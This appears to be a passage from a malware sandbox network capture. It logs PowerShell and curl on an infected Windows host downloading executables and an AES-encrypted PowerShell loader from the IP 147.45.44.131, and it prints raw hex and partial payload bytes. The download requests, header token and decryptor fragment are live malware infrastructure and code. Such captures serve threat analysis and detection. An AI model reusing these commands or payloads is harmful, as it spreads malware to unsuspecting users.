                                                                                              Data Ascii: nIdiI1fvgE/FVCP0BdD3ZlYWUFWHcmSC6ib7YC928Snb4pmK+09Q/K9A/3a+N7D4aS9hBaaMMJJAbNljQ5jC1C7oHlHK2qCyZO0JW+0MQQ8xS0wRokTNqLcQY
                                                                                              Dec 27, 2024 22:33:06.356372118 CET1236INData Raw: 00 6a 00 4b 00 36 00 4b 00 44 00 6c 00 38 00 64 00 54 00 70 00 59 00 62 00 6d 00 56 00 4f 00 6a 00 5a 00 62 00 66 00 33 00 30 00 44 00 68 00 64 00 74 00 77 00 6e 00 2f 00 43 00 6f 00 43 00 42 00 6f 00 51 00 31 00 49 00 39 00 61 00 63 00 4c 00 43
                                                                                              Data Ascii: jK6KDl8dTpYbmVOjZbf30Dhdtwn/CoCBoQ1I9acLCFa/N5fw+0m918DpqJgakyyjtdv/cfyHZ+HDNtGC7p87V7O947G1arMewNjy0w/COvWdn5lWF6T14o/ip
                                                                                              Dec 27, 2024 22:33:06.356427908 CET1236INData Raw: 00 6c 00 59 00 6c 00 49 00 62 00 2b 00 4d 00 4c 00 62 00 76 00 6c 00 6f 00 42 00 67 00 51 00 71 00 46 00 76 00 35 00 49 00 65 00 56 00 51 00 70 00 51 00 36 00 70 00 33 00 4a 00 35 00 6e 00 4d 00 79 00 4e 00 4b 00 4b 00 42 00 52 00 55 00 2b 00 78
                                                                                              Data Ascii: lYlIb+MLbvloBgQqFv5IeVQpQ6p3J5nMyNKKBRU+xZpXa9SD6sF6eonIRsxSHiY8lbVBVlHXccFWLlWfqNWzVj5pUo9f9Jfb0/pdxaiMX1MLzUXE1kXXRVNaN
                                                                                              Dec 27, 2024 22:33:06.356462002 CET1236INData Raw: 00 31 00 6d 00 32 00 6c 00 2f 00 5a 00 69 00 65 00 66 00 43 00 41 00 44 00 78 00 79 00 62 00 61 00 52 00 70 00 52 00 51 00 67 00 2b 00 34 00 79 00 39 00 4d 00 4a 00 74 00 56 00 69 00 43 00 78 00 4e 00 4a 00 64 00 41 00 42 00 70 00 36 00 72 00 41
                                                                                              Data Ascii: 1m2l/ZiefCADxybaRpRQg+4y9MJtViCxNJdABp6rAv5GhNjRi5eeNrJxHPkRD3H27bOwo/lRlaFdtp1cCPjpwhIsDxRK11iwlorFFSBmdDv5WwvfsPjMWvoAj
                                                                                              Dec 27, 2024 22:33:06.476685047 CET1236INData Raw: 00 6e 00 7a 00 6b 00 43 00 63 00 77 00 78 00 42 00 39 00 48 00 6f 00 58 00 44 00 6a 00 7a 00 5a 00 66 00 63 00 6e 00 48 00 75 00 4d 00 2f 00 39 00 62 00 6d 00 6a 00 73 00 53 00 30 00 47 00 41 00 35 00 52 00 70 00 49 00 57 00 48 00 49 00 33 00 38
                                                                                              Data Ascii: nzkCcwxB9HoXDjzZfcnHuM/9bmjsS0GA5RpIWHI38CL7WPgjdJaEGBXlxrAEsq8b50odWd/t44lLDHVp/44Qd96PHj7Lvgtavrr+iXscoyqYVPNzG8OUCnCYK


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              4192.168.2.449738147.45.44.131807760C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 27, 2024 22:33:05.025715113 CET181OUTGET /infopage/ubvsd.exe HTTP/1.1
                                                                                              X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                                                              Host: 147.45.44.131
                                                                                              Connection: Keep-Alive
                                                                                              Dec 27, 2024 22:33:06.288124084 CET1236INHTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:06 GMT
                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                              Last-Modified: Wed, 25 Dec 2024 00:05:52 GMT
                                                                                              ETag: "8e00-62a0cfe2cdd29"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 36352
                                                                                              Keep-Alive: timeout=5, max=100
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-msdos-program
                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 50 91 b7 cd 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 84 00 00 00 08 00 00 00 00 00 00 1a a3 00 00 00 20 00 00 00 c0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c8 a2 00 00 4f 00 00 00 00 c0 00 00 d0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 0c 00 00 00 ac a2 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELP"0 @ `O H.text `.rsrc@@.reloc@BHD"h0ss(oooooi(oiiYii(oio ,o,o,o*(t0(((o*(*0rpss o!rsp~(o"&o!rs
                                                                                              Dec 27, 2024 22:33:06.288167953 CET1236INData Raw: 70 7e 01 00 00 04 28 02 00 00 06 6f 22 00 00 0a 26 07 17 6f 23 00 00 0a 07 17 8d 22 00 00 01 25 16 06 7e 01 00 00 04 28 02 00 00 06 a2 6f 24 00 00 0a 6f 25 00 00 0a 72 3a 74 00 70 7e 01 00 00 04 28 02 00 00 06 6f 26 00 00 0a 72 94 74 00 70 7e 01
                                                                                              Data Ascii: p~(o"&o#"%~(o$o%r:tp~(o&rtp~(o'o(&*(*(*(*(*j(rtp(o*BSJBv4.0.30319l#~,P#Strings|(u#US~
                                                                                              Dec 27, 2024 22:33:06.288206100 CET1236INData Raw: 00 42 69 74 56 65 63 74 6f 72 33 32 00 67 32 00 70 32 00 43 6f 6e 73 6f 6c 65 41 70 70 31 36 37 00 67 65 74 5f 55 54 46 38 00 3c 4d 6f 64 75 6c 65 3e 00 73 65 74 5f 49 56 00 6d 73 63 6f 72 6c 69 62 00 41 64 64 00 53 79 73 74 65 6d 2e 43 6f 6c 6c
                                                                                              Data Ascii: BitVector32g2p2ConsoleApp167get_UTF8<Module>set_IVmscorlibAddSystem.Collections.SpecializedGetMethodCompileAssemblyFromSourceset_ModePaddingModeCipherModeInvokeIDisposableSystem.Net.MimeGetTypeSystem.CoreMethodBaseDispose
                                                                                              Dec 27, 2024 22:33:06.288259983 CET1236INData Raw: 6e 76 65 72 74 00 53 79 73 74 65 6d 2e 54 65 78 74 00 49 6d 67 6c 73 77 00 41 72 72 61 79 00 73 65 74 5f 4b 65 79 00 53 79 73 74 65 6d 2e 53 65 63 75 72 69 74 79 2e 43 72 79 70 74 6f 67 72 61 70 68 79 00 67 65 74 5f 43 6f 6d 70 69 6c 65 64 41 73
                                                                                              Data Ascii: nvertSystem.TextImglswArrayset_KeySystem.Security.Cryptographyget_CompiledAssemblyCopyset_GenerateInMemorys7eV61nHmqYXSS+ryCq4pt/5Wpqq5HxdeLHXTEHvwc/zpyD/XGm2DyHLr95ry
                                                                                              Dec 27, 2024 22:33:06.288311005 CET1236INData Raw: 00 32 00 59 00 43 00 51 00 32 00 6c 00 4b 00 71 00 73 00 49 00 77 00 61 00 43 00 7a 00 59 00 6e 00 4c 00 75 00 5a 00 34 00 74 00 6d 00 49 00 56 00 79 00 4a 00 77 00 34 00 57 00 36 00 55 00 68 00 6c 00 49 00 72 00 64 00 74 00 4f 00 70 00 72 00 2b
                                                                                              Data Ascii: 2YCQ2lKqsIwaCzYnLuZ4tmIVyJw4W6UhlIrdtOpr+tNdW3vqkhU8XyaXCKs9GA8lM8UCFkZ+kiJGJspAPSPXC0FjSGpiIs5LRtws1CW+PuXqQ2Lpvd5ZUsFST
                                                                                              Dec 27, 2024 22:33:06.288346052 CET1236INData Raw: 00 31 00 6e 00 71 00 5a 00 74 00 55 00 31 00 44 00 44 00 6a 00 54 00 61 00 4c 00 64 00 45 00 79 00 79 00 57 00 42 00 31 00 76 00 4d 00 73 00 4a 00 41 00 30 00 70 00 79 00 78 00 39 00 51 00 4e 00 39 00 75 00 68 00 34 00 64 00 49 00 54 00 50 00 70
                                                                                              Data Ascii: 1nqZtU1DDjTaLdEyyWB1vMsJA0pyx9QN9uh4dITPp8I6d+YKrfTb7W4lSia7zPzzCvXV1QXwclyuVeIcDXENvlXiOTChtQwxDxxwihXPmvksDBkeZ47M4LuWf
                                                                                              Dec 27, 2024 22:33:06.288379908 CET744INData Raw: 00 6e 00 49 00 64 00 69 00 49 00 31 00 66 00 76 00 67 00 45 00 2f 00 46 00 56 00 43 00 50 00 30 00 42 00 64 00 44 00 33 00 5a 00 6c 00 59 00 57 00 55 00 46 00 57 00 48 00 63 00 6d 00 53 00 43 00 36 00 69 00 62 00 37 00 59 00 43 00 39 00 32 00 38
                                                                                              Data Ascii: nIdiI1fvgE/FVCP0BdD3ZlYWUFWHcmSC6ib7YC928Snb4pmK+09Q/K9A/3a+N7D4aS9hBaaMMJJAbNljQ5jC1C7oHlHK2qCyZO0JW+0MQQ8xS0wRokTNqLcQY
                                                                                              Dec 27, 2024 22:33:06.288414955 CET1236INData Raw: 00 75 00 57 00 35 00 63 00 66 00 30 00 2b 00 6a 00 2f 00 78 00 4f 00 55 00 5a 00 6a 00 6c 00 6a 00 6a 00 4b 00 36 00 4b 00 44 00 6c 00 38 00 64 00 54 00 70 00 59 00 62 00 6d 00 56 00 4f 00 6a 00 5a 00 62 00 66 00 33 00 30 00 44 00 68 00 64 00 74
                                                                                              Data Ascii: uW5cf0+j/xOUZjljjK6KDl8dTpYbmVOjZbf30Dhdtwn/CoCBoQ1I9acLCFa/N5fw+0m918DpqJgakyyjtdv/cfyHZ+HDNtGC7p87V7O947G1arMewNjy0w/CO
                                                                                              Dec 27, 2024 22:33:06.288502932 CET1236INData Raw: 00 75 00 61 00 35 00 6c 00 36 00 31 00 51 00 2b 00 4c 00 65 00 33 00 32 00 4b 00 4f 00 74 00 47 00 6c 00 59 00 6c 00 49 00 62 00 2b 00 4d 00 4c 00 62 00 76 00 6c 00 6f 00 42 00 67 00 51 00 71 00 46 00 76 00 35 00 49 00 65 00 56 00 51 00 70 00 51
                                                                                              Data Ascii: ua5l61Q+Le32KOtGlYlIb+MLbvloBgQqFv5IeVQpQ6p3J5nMyNKKBRU+xZpXa9SD6sF6eonIRsxSHiY8lbVBVlHXccFWLlWfqNWzVj5pUo9f9Jfb0/pdxaiMX
                                                                                              Dec 27, 2024 22:33:06.288532972 CET248INData Raw: 00 6f 00 57 00 39 00 42 00 51 00 64 00 57 00 53 00 61 00 35 00 70 00 69 00 4f 00 4b 00 30 00 54 00 31 00 6d 00 32 00 6c 00 2f 00 5a 00 69 00 65 00 66 00 43 00 41 00 44 00 78 00 79 00 62 00 61 00 52 00 70 00 52 00 51 00 67 00 2b 00 34 00 79 00 39
                                                                                              Data Ascii: oW9BQdWSa5piOK0T1m2l/ZiefCADxybaRpRQg+4y9MJtViCxNJdABp6rAv5GhNjRi5eeNrJxHPkRD3H27bOwo/lRlaFdtp1cCPjpwhIsDxRK11iwlorFFSBmd
                                                                                              Dec 27, 2024 22:33:06.408155918 CET1236INData Raw: 00 57 00 77 00 76 00 66 00 73 00 50 00 6a 00 4d 00 57 00 76 00 6f 00 41 00 6a 00 65 00 62 00 6e 00 44 00 33 00 49 00 4e 00 30 00 68 00 44 00 44 00 44 00 55 00 77 00 67 00 4e 00 64 00 49 00 36 00 64 00 2f 00 78 00 4d 00 37 00 72 00 69 00 73 00 67
                                                                                              Data Ascii: WwvfsPjMWvoAjebnD3IN0hDDDUwgNdI6d/xM7risgEhA+JCENDLBwmhmlfadgxFAnbo/b/wRgbi5wDasRd8u7XU0pL6HkcW+K45VL3urJluHUO6VeO0HIkGjL


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              5192.168.2.449739147.45.44.131807880C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 27, 2024 22:33:05.176923037 CET181OUTGET /infopage/ubvsd.exe HTTP/1.1
                                                                                              X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                                                              Host: 147.45.44.131
                                                                                              Connection: Keep-Alive
                                                                                              Dec 27, 2024 22:33:06.440737009 CET1236INHTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:06 GMT
                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                              Last-Modified: Wed, 25 Dec 2024 00:05:52 GMT
                                                                                              ETag: "8e00-62a0cfe2cdd29"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 36352
                                                                                              Keep-Alive: timeout=5, max=100
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-msdos-program
                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 50 91 b7 cd 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 84 00 00 00 08 00 00 00 00 00 00 1a a3 00 00 00 20 00 00 00 c0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c8 a2 00 00 4f 00 00 00 00 c0 00 00 d0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 0c 00 00 00 ac a2 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELP"0 @ `O H.text `.rsrc@@.reloc@BHD"h0ss(oooooi(oiiYii(oio ,o,o,o*(t0(((o*(*0rpss o!rsp~(o"&o!rs
                                                                                              Dec 27, 2024 22:33:06.440768003 CET224INData Raw: 70 7e 01 00 00 04 28 02 00 00 06 6f 22 00 00 0a 26 07 17 6f 23 00 00 0a 07 17 8d 22 00 00 01 25 16 06 7e 01 00 00 04 28 02 00 00 06 a2 6f 24 00 00 0a 6f 25 00 00 0a 72 3a 74 00 70 7e 01 00 00 04 28 02 00 00 06 6f 26 00 00 0a 72 94 74 00 70 7e 01
                                                                                              Data Ascii: p~(o"&o#"%~(o$o%r:tp~(o&rtp~(o'o(&*(*(*(*(*j(rtp(o*BSJBv4.0.30319l#~,P#Strings
                                                                                              Dec 27, 2024 22:33:06.440804005 CET1236INData Raw: 00 00 7c 09 00 00 28 75 00 00 23 55 53 00 a4 7e 00 00 10 00 00 00 23 47 55 49 44 00 00 00 b4 7e 00 00 b4 01 00 00 23 42 6c 6f 62 00 00 00 00 00 00 00 02 00 00 01 57 15 02 00 09 00 00 00 00 fa 01 33 00 16 00 00 01 00 00 00 28 00 00 00 05 00 00 00
                                                                                              Data Ascii: |(u#US~#GUID~#BlobW3((d:A:Z0444(444G4{4b{
                                                                                              Dec 27, 2024 22:33:06.440860033 CET1236INData Raw: 00 4d 65 74 68 6f 64 42 61 73 65 00 44 69 73 70 6f 73 65 00 47 75 69 64 41 74 74 72 69 62 75 74 65 00 44 65 62 75 67 67 61 62 6c 65 41 74 74 72 69 62 75 74 65 00 43 6f 6d 56 69 73 69 62 6c 65 41 74 74 72 69 62 75 74 65 00 41 73 73 65 6d 62 6c 79
                                                                                              Data Ascii: MethodBaseDisposeGuidAttributeDebuggableAttributeComVisibleAttributeAssemblyTitleAttributeAssemblyTrademarkAttributeTargetFrameworkAttributeAssemblyFileVersionAttributeAssemblyConfigurationAttributeAssemblyDescriptionAttributeCompi
                                                                                              Dec 27, 2024 22:33:06.440922976 CET1236INData Raw: 00 44 00 79 00 48 00 4c 00 72 00 39 00 35 00 72 00 79 00 35 00 56 00 31 00 50 00 54 00 54 00 58 00 64 00 4c 00 38 00 62 00 54 00 6d 00 77 00 55 00 30 00 77 00 77 00 4b 00 6c 00 62 00 6c 00 42 00 73 00 6a 00 72 00 39 00 69 00 74 00 54 00 2b 00 6c
                                                                                              Data Ascii: DyHLr95ry5V1PTTXdL8bTmwU0wwKlblBsjr9itT+lPYw0Qdr5wrUVun1t1fvfVtpcLKk7BJijHpBCpYSdUEFi6a/fzR9sx9M0Q3VekyFOo87g3M8dI9Rl0psF
                                                                                              Dec 27, 2024 22:33:06.440959930 CET1236INData Raw: 00 76 00 64 00 35 00 5a 00 55 00 73 00 46 00 53 00 54 00 7a 00 32 00 43 00 45 00 63 00 6e 00 79 00 57 00 75 00 59 00 36 00 6e 00 51 00 48 00 50 00 43 00 42 00 46 00 38 00 63 00 6b 00 38 00 6b 00 76 00 72 00 36 00 41 00 37 00 6b 00 4d 00 51 00 4e
                                                                                              Data Ascii: vd5ZUsFSTz2CEcnyWuY6nQHPCBF8ck8kvr6A7kMQNriOD8qWRMubEcNVBV7mC0XFYH8C5WeNmXC4LvezrsxtFATnc191fs/AnKB4BTEyM2BaxLABQvacSKPZk
                                                                                              Dec 27, 2024 22:33:06.441009998 CET1236INData Raw: 00 5a 00 34 00 37 00 4d 00 34 00 4c 00 75 00 57 00 66 00 55 00 34 00 6e 00 64 00 46 00 70 00 38 00 42 00 6c 00 56 00 5a 00 74 00 57 00 2f 00 4f 00 64 00 4e 00 73 00 34 00 6c 00 54 00 75 00 73 00 4f 00 48 00 32 00 6f 00 71 00 54 00 4c 00 67 00 4f
                                                                                              Data Ascii: Z47M4LuWfU4ndFp8BlVZtW/OdNs4lTusOH2oqTLgOIO94yny1fscqUUOOKNMWMp843MDJBLIdUk/WyowJL63/U7wJg+Khv3FRNAfvOQRimhdvs4awh8XwEJIm
                                                                                              Dec 27, 2024 22:33:06.441044092 CET520INData Raw: 00 6f 00 6b 00 54 00 4e 00 71 00 4c 00 63 00 51 00 59 00 46 00 64 00 33 00 58 00 35 00 4e 00 79 00 47 00 45 00 70 00 6f 00 6c 00 68 00 62 00 47 00 37 00 63 00 79 00 6a 00 47 00 74 00 54 00 38 00 64 00 77 00 74 00 4d 00 6a 00 59 00 32 00 78 00 30
                                                                                              Data Ascii: okTNqLcQYFd3X5NyGEpolhbG7cyjGtT8dwtMjY2x07r8QFek8zXxGgoIU0JHQGl8OmcJyJfgw2CPk3FCQb9orPY9u65c6VQXM34BXwRabqIRv9gcTFCpnv5nv
                                                                                              Dec 27, 2024 22:33:06.441076994 CET1236INData Raw: 00 75 00 57 00 35 00 63 00 66 00 30 00 2b 00 6a 00 2f 00 78 00 4f 00 55 00 5a 00 6a 00 6c 00 6a 00 6a 00 4b 00 36 00 4b 00 44 00 6c 00 38 00 64 00 54 00 70 00 59 00 62 00 6d 00 56 00 4f 00 6a 00 5a 00 62 00 66 00 33 00 30 00 44 00 68 00 64 00 74
                                                                                              Data Ascii: uW5cf0+j/xOUZjljjK6KDl8dTpYbmVOjZbf30Dhdtwn/CoCBoQ1I9acLCFa/N5fw+0m918DpqJgakyyjtdv/cfyHZ+HDNtGC7p87V7O947G1arMewNjy0w/CO
                                                                                              Dec 27, 2024 22:33:06.441131115 CET1236INData Raw: 00 75 00 61 00 35 00 6c 00 36 00 31 00 51 00 2b 00 4c 00 65 00 33 00 32 00 4b 00 4f 00 74 00 47 00 6c 00 59 00 6c 00 49 00 62 00 2b 00 4d 00 4c 00 62 00 76 00 6c 00 6f 00 42 00 67 00 51 00 71 00 46 00 76 00 35 00 49 00 65 00 56 00 51 00 70 00 51
                                                                                              Data Ascii: ua5l61Q+Le32KOtGlYlIb+MLbvloBgQqFv5IeVQpQ6p3J5nMyNKKBRU+xZpXa9SD6sF6eonIRsxSHiY8lbVBVlHXccFWLlWfqNWzVj5pUo9f9Jfb0/pdxaiMX
                                                                                              Dec 27, 2024 22:33:06.562025070 CET1236INData Raw: 00 6f 00 57 00 39 00 42 00 51 00 64 00 57 00 53 00 61 00 35 00 70 00 69 00 4f 00 4b 00 30 00 54 00 31 00 6d 00 32 00 6c 00 2f 00 5a 00 69 00 65 00 66 00 43 00 41 00 44 00 78 00 79 00 62 00 61 00 52 00 70 00 52 00 51 00 67 00 2b 00 34 00 79 00 39
                                                                                              Data Ascii: oW9BQdWSa5piOK0T1m2l/ZiefCADxybaRpRQg+4y9MJtViCxNJdABp6rAv5GhNjRi5eeNrJxHPkRD3H27bOwo/lRlaFdtp1cCPjpwhIsDxRK11iwlorFFSBmd


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              6192.168.2.449740147.45.44.131806656C:\Windows\SysWOW64\curl.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 27, 2024 22:33:07.399923086 CET195OUTGET /infopage/pilgm.ps1 HTTP/1.1
                                                                                              Host: 147.45.44.131
                                                                                              User-Agent: curl/7.83.1
                                                                                              Accept: */*
                                                                                              X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                                                              Dec 27, 2024 22:33:08.709621906 CET1236INHTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:08 GMT
                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                              Last-Modified: Wed, 25 Dec 2024 00:09:39 GMT
                                                                                              ETag: "638-62a0d0bb75721"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 1592
                                                                                              Data Raw: 0d 0a 24 59 6d 62 41 20 3d 20 27 7a 7a 66 62 64 65 36 33 48 59 4b 6c 61 4e 30 54 6f 6c 6f 6d 78 48 70 64 67 51 73 45 46 50 53 73 4b 49 51 4e 6e 2b 5a 54 45 69 77 3d 27 0d 0a 24 53 47 62 35 20 3d 20 27 63 6f 33 44 38 75 64 37 53 47 30 50 6b 4a 6c 6b 62 57 42 46 78 51 3d 3d 27 0d 0a 24 32 66 4a 70 20 3d 20 27 6f 30 58 57 35 5a 37 2b 2f 55 6b 41 54 42 58 38 73 54 79 4e 4f 39 4c 4c 63 41 4a 47 73 6f 67 34 5a 2b 34 37 6e 70 35 69 47 35 6d 79 65 42 51 4b 47 61 37 4f 69 53 47 61 73 70 36 4e 69 7a 45 54 42 58 48 6e 6b 49 6c 63 2f 4a 33 38 61 50 4c 6f 6e 50 2f 70 47 66 33 48 71 36 36 2b 32 62 76 2f 63 66 70 73 68 68 63 58 38 48 6d 70 70 65 7a 46 46 6e 6e 4f 77 6c 73 42 4c 44 41 63 4c 49 4a 79 79 73 46 52 6a 71 61 39 63 74 65 72 51 32 74 4d 48 4a 45 45 76 2b 62 43 6d 2b 79 73 35 52 4c 64 6a 44 57 49 6e 59 36 75 75 46 56 69 68 5a 4c 71 6b 64 63 33 49 64 39 6a 63 4e 4d 73 4c 71 47 48 54 38 63 6b 6e 50 43 69 37 77 6b 72 55 52 2f 6d 6a 43 30 47 67 6b 30 6c 77 79 34 62 78 64 52 41 63 77 43 62 6d 6d 4a 30 65 70 33 [TRUNCATED]
                                                                                              Data Ascii: $YmbA = 'zzfbde63HYKlaN0TolomxHpdgQsEFPSsKIQNn+ZTEiw='$SGb5 = 'co3D8ud7SG0PkJlkbWBFxQ=='$2fJp = 'o0XW5Z7+/UkATBX8sTyNO9LLcAJGsog4Z+47np5iG5myeBQKGa7OiSGasp6NizETBXHnkIlc/J38aPLonP/pGf3Hq66+2bv/cfpshhcX8HmppezFFnnOwlsBLDAcLIJyysFRjqa9cterQ2tMHJEEv+bCm+ys5RLdjDWInY6uuFVihZLqkdc3Id9jcNMsLqGHT8cknPCi7wkrUR/mjC0Ggk0lwy4bxdRAcwCbmmJ0ep3LQVIQyOptXO9gXE/dzsGuIpdxDQbaXwzcIAqgpqnenHUOMv3cilCoyUdaaSRewmex+DM1QoA6PmkZZLEQrkrDpW3vem/bKOFvrgnuR2C8IyGBHEvmsCJqTCkf2jq3NfmjDqnsS5QLZCuazft30vziIumSGfvrYyWAd5OJP1YXQde59s21K1WY0NQn6n0+rnGUJT64wF5ylX8Kxv1keWC/rV4Ugf7fTpfRwKPgLwf/Z650DCiv+jkc2YubbaE+XIjFQ9NBBNOKgmhnmhOLce3sSiDJmXlZU++MmxIY0wwzd1P8M3InRE4NQqu90QnBj0JmLlbt3MJVBsDMEPfn8GLUcE6Cskc1o7ASk9TIsPmmKpBnEyWcUxQYPlt4syzxOD3AkEcuXcbzzT52K7HZbSLz'function etCc ($azvH, $YmbA, $SGb5) { $NWby = [Convert]::FromBase64String($YmbA) $zlhV = [Convert]::FromBase64String($SGb5) $aWSD = [Convert]::FromBase64String($azvH) $GyiY = [System.Security.Cryptography.Aes]::Create() $GyiY.Key = $NWby [TRUNCATED]
                                                                                              Dec 27, 2024 22:33:08.709646940 CET561INData Raw: 56 0d 0a 20 20 20 20 24 47 79 69 59 2e 50 61 64 64 69 6e 67 20 3d 20 5b 53 79 73 74 65 6d 2e 53 65 63 75 72 69 74 79 2e 43 72 79 70 74 6f 67 72 61 70 68 79 2e 50 61 64 64 69 6e 67 4d 6f 64 65 5d 3a 3a 50 4b 43 53 37 0d 0a 20 20 20 20 24 4b 52 32
                                                                                              Data Ascii: V $GyiY.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7 $KR29 = $GyiY.CreateDecryptor($GyiY.Key, $GyiY.IV) $aHGE = New-Object System.IO.MemoryStream(, $aWSD) $dqtj = New-Object System.Security.Cryptography.Crypt


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              7192.168.2.449741147.45.44.131807760C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 27, 2024 22:33:08.738042116 CET157OUTGET /infopage/hgfpj.exe HTTP/1.1
                                                                                              X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                                                              Host: 147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.082636118 CET1236INHTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:09 GMT
                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                              Last-Modified: Wed, 25 Dec 2024 16:22:08 GMT
                                                                                              ETag: "4c000-62a1aa1957b5c"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 311296
                                                                                              Content-Type: application/x-msdos-program
                                                                                              Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 86 59 69 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 0a 04 00 00 b2 00 00 00 00 00 00 00 86 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bf 3b 04 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 05 00 5c 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 3d [TRUNCATED]
                                                                                              Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELYig@p@;0\;=.text `.rdata "@@.data8PT0@.reloc\;0<@B
